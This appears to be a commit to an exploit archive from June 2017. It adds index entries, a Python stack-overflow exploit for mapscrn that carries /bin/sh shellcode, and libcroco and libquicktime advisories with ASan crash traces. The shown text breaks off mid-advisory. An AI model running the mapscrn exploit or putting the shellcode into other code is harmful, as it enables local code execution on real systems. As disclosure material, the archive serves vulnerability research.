DB: 2017-06-10
6 new exploits

Mapscrn 2.03 - Local Buffer Overflow
libcroco 0.6.12 - Denial of Service
libquicktime 1.2.4 - Denial of Service
Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition
Apple macOS - Disk Arbitration Daemon Race Condition
Craft CMS 2.6 - Cross-Site Scripting
parent
bed1811f1d
commit
fbe517f675
7 changed files with 935 additions and 0 deletions
|
@ -5536,6 +5536,9 @@ id,file,description,date,author,platform,type,port
|
|||
42138,platforms/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",linux,dos,0
|
||||
42139,platforms/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",linux,dos,0
|
||||
42140,platforms/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",windows,dos,0
|
||||
42144,platforms/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",linux,dos,0
|
||||
42147,platforms/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
|
||||
42148,platforms/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -9039,6 +9042,8 @@ id,file,description,date,author,platform,type,port
|
|||
42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0
|
||||
42141,platforms/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",windows,local,0
|
||||
42142,platforms/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local,0
|
||||
42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
|
||||
42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -37972,3 +37977,4 @@ id,file,description,date,author,platform,type,port
|
|||
42131,platforms/php/webapps/42131.txt,"Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting",2017-06-07,"Ahsan Tahir",php,webapps,0
|
||||
42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0
|
||||
42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
|
||||
42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0
|
||||
|
|
|
59
platforms/linux/dos/42144.py
Executable file
59
platforms/linux/dos/42144.py
Executable file
|
@ -0,0 +1,59 @@
|
|||
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
|
||||
# Tested on: GNU/Linux - Kali 2017.1 Release
|
||||
#
|
||||
# Description: Mapscrn ( Part of setfont ) 2.0.3
|
||||
# The mapscrn command loads a user defined output character mapping table into the console driver.
|
||||
# The console driver may be later put into use user-defined mapping table mode by outputting a special
|
||||
# escape sequence to the console device.
|
||||
#
|
||||
# An attacker could exploit this vulnerability to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in a
|
||||
# denial-of-service condition.
|
||||
#
|
||||
# Architecture: all
|
||||
#
|
||||
# Vendor homepage: http://ccross.msk.su
|
||||
#
|
||||
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
|
||||
# at 0x4831518: strcpy (vg_replace_strmem.c:506)
|
||||
# by 0x10A71F: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x10933B: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x41414140: ???
|
||||
#
|
||||
# Invalid read of size 2
|
||||
# at 0x488DFCA: getenv (getenv.c:84)
|
||||
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
|
||||
# by 0x48867AE: __dcigettext (dcigettext.c:667)
|
||||
# by 0x48855F5: dcgettext (dcgettext.c:47)
|
||||
# by 0x109733: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x41414140: ???
|
||||
# Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
|
||||
#
|
||||
# Process terminating with default action of signal 11 (SIGSEGV)
|
||||
# Access not within mapped region at address 0x41414141
|
||||
# at 0x488DFCA: getenv (getenv.c:84)
|
||||
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
|
||||
# by 0x48867AE: __dcigettext (dcigettext.c:667)
|
||||
# by 0x48855F5: dcgettext (dcgettext.c:47)
|
||||
# by 0x109733: ??? (in /usr/bin/mapscrn)
|
||||
# by 0x41414140: ???
|
||||
|
||||
|
||||
import os,subprocess
|
||||
|
||||
junk = "\x41" * 4880 # junk to offset
|
||||
nops = "\x90" * 24 # nops
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
esp = "\xe0\xdf\xff\xbf" # Must be changed
|
||||
buffer = junk + esp + nops + shellcode # Craft the buffer
|
||||
|
||||
try:
|
||||
print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
|
||||
print("[*] Please wait.. running")
|
||||
subprocess.call(["mapscrn", buffer])
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "Mapscrn not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
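Review bot: The `except OSError` branch compares against `os.errno.ENOENT`, but `os.errno` is an undocumented alias that was removed in Python 3.7, so on those interpreters the handler itself fails with AttributeError instead of reporting that the binary is missing; `import errno` at the top and use `if e.errno == errno.ENOENT:`. The same branch uses `print "..."` statements while the try body a few lines above uses `print(...)`, which pins the file to Python 2 and reads inconsistently — one form should be used throughout. The header line `# Description: Mapscrn ( Part of setfont ) 2.0.3` and the files.csv entry in this commit ("Mapscrn 2.03") give different version strings and should agree. The header also claims arbitrary code execution while the entry is indexed under dos; the description should state what the PoC actually demonstrates.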
69
platforms/linux/dos/42147.txt
Executable file
69
platforms/linux/dos/42147.txt
Executable file
|
@ -0,0 +1,69 @@
|
|||
libcroco multiple vulnerabilities
|
||||
================
|
||||
Author : qflb.wu
|
||||
===============
|
||||
|
||||
|
||||
Introduction:
|
||||
=============
|
||||
Libcroco is a standalone css2 parsing and manipulation library.
|
||||
The parser provides a low level event driven SAC like api and a css object model like api.
|
||||
Libcroco provides a CSS2 selection engine and an experimental xml/css rendering engine.
|
||||
|
||||
|
||||
Affected version:
|
||||
=====
|
||||
0.6.12
|
||||
|
||||
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
1.
|
||||
the cr_tknzr_parse_comment function in cr-tknzr.c in libcroco 0.6.12 can cause a denial of service (memory allocation error) via a crafted CSS file.
|
||||
|
||||
|
||||
./csslint-0.6 --dump-location libcroco_0_6_12_memory_allocation_error.css
|
||||
|
||||
|
||||
==21841==ERROR: AddressSanitizer failed to allocate 0x20002000 (536879104) bytes of LargeMmapAllocator: 12
|
||||
...
|
||||
==21841==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
|
||||
...
|
||||
#10 0x7fd78c2fcb4d in cr_tknzr_parse_comment /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:462
|
||||
#11 0x7fd78c2fcb4d in cr_tknzr_get_next_token /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:2218
|
||||
#12 0x7fd78c356f6e in cr_parser_try_to_skip_spaces_and_comments /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:634
|
||||
#13 0x7fd78c368a43 in cr_parser_parse_stylesheet /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:2538
|
||||
#14 0x7fd78c368a43 in cr_parser_parse /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:4381
|
||||
#15 0x480a8e in sac_parse_and_display_locations /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:960
|
||||
#16 0x480a8e in main /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:1001
|
||||
#17 0x7fd78b397f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
|
||||
#18 0x47c95c in _start (/home/a/Downloads/libcroco-0.6.12/csslint/.libs/lt-csslint-0.6+0x47c95c)
|
||||
|
||||
|
||||
Reproducer:
|
||||
libcroco_0_6_12_memory_allocation_error.css
|
||||
CVE:
|
||||
CVE-2017-8834
|
||||
|
||||
|
||||
2.
|
||||
The cr_parser_parse_selector_core function in cr-parser.c in libcroco 0.6.12 can cause a denial of service(infinite loop and CPU consumption) via a crafted CSS file.
|
||||
|
||||
|
||||
./csslint-0.6 --dump-location libcroco_0_6_12_infinite_loop.css
|
||||
|
||||
|
||||
Reproducer:
|
||||
libcroco_0_6_12_infinite_loop.css
|
||||
CVE:
|
||||
CVE-2017-8871
|
||||
|
||||
|
||||
===============================
|
||||
|
||||
|
||||
qflb.wu () dbappsecurity com cn
|
||||
|
||||
|
||||
Proofs of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42147.zip
|
397
platforms/linux/dos/42148.txt
Executable file
397
platforms/linux/dos/42148.txt
Executable file
|
@ -0,0 +1,397 @@
|
|||
libquicktime multiple vulnerabilities
|
||||
|
||||
|
||||
================
|
||||
Author : qflb.wu
|
||||
===============
|
||||
|
||||
|
||||
Introduction:
|
||||
=============
|
||||
The libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.
|
||||
|
||||
|
||||
Affected version:
|
||||
=====
|
||||
1.2.4
|
||||
|
||||
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
##################################
|
||||
1.
|
||||
the quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
|
||||
CVE:
|
||||
CVE-2017-9122
|
||||
|
||||
|
||||
###################################
|
||||
2.
|
||||
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
|
||||
|
||||
|
||||
ASAN:SIGSEGV
|
||||
=================================================================
|
||||
==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)
|
||||
==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
|
||||
#0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)
|
||||
#1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)
|
||||
#2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)
|
||||
#3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
AddressSanitizer can not provide additional info.
|
||||
SUMMARY: AddressSanitizer: SEGV ??:0 ??
|
||||
==14254==ABORTING
|
||||
|
||||
|
||||
debug info:
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
...
|
||||
Stopped reason: SIGSEGV
|
||||
0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>,
|
||||
constant=<optimized out>) at lqt_quicktime.c:1242
|
||||
1242 return
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
|
||||
CVE:
|
||||
CVE-2017-9123
|
||||
|
||||
|
||||
###################################
|
||||
3.
|
||||
the quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
|
||||
|
||||
|
||||
ASAN:SIGSEGV
|
||||
=================================================================
|
||||
==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)
|
||||
==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
|
||||
#0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)
|
||||
#1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)
|
||||
#2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)
|
||||
#3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)
|
||||
#4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)
|
||||
#5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)
|
||||
#6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)
|
||||
#7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
AddressSanitizer can not provide additional info.
|
||||
SUMMARY: AddressSanitizer: SEGV ??:0 ??
|
||||
==14359==ABORTING
|
||||
|
||||
|
||||
debug info:
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
Stopped reason: SIGSEGV
|
||||
0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>,
|
||||
_output=<optimized out>) at util.c:874
|
||||
874if(input[0] == output[0] &&
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
|
||||
CVE:
|
||||
CVE-2017-9124
|
||||
|
||||
|
||||
###################################
|
||||
4.
|
||||
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528
|
||||
READ of size 4 at 0x602000009cd4 thread T0
|
||||
#0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242
|
||||
#1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138
|
||||
#2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996
|
||||
#3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa
|
||||
0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
|
||||
0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa
|
||||
0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01
|
||||
0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa
|
||||
=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04
|
||||
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==40038==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9125
|
||||
|
||||
|
||||
###################################
|
||||
5.
|
||||
the quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718
|
||||
WRITE of size 1 at 0x602000009ce4 thread T0
|
||||
#0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69
|
||||
#1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147
|
||||
#2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56
|
||||
#3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220
|
||||
#4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
|
||||
#5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
|
||||
#6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
|
||||
#7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
|
||||
#8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
|
||||
#9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
|
||||
#10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
|
||||
#11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa
|
||||
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==41637==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9126
|
||||
|
||||
|
||||
###################################
|
||||
6.
|
||||
the quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8
|
||||
WRITE of size 1 at 0x602000009cb1 thread T0
|
||||
#0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84
|
||||
#1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557
|
||||
#2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694
|
||||
#3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336
|
||||
#4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231
|
||||
#5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155
|
||||
#6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247
|
||||
#7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221
|
||||
#8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791
|
||||
#9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
|
||||
#10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
|
||||
#11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
|
||||
#12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04
|
||||
0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==41642==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9127
|
||||
|
||||
|
||||
###################################
|
||||
7.
|
||||
the quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
|
||||
|
||||
|
||||
./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
|
||||
|
||||
|
||||
=================================================================
|
||||
==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008
|
||||
READ of size 4 at 0x602000009d00 thread T0
|
||||
#0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998
|
||||
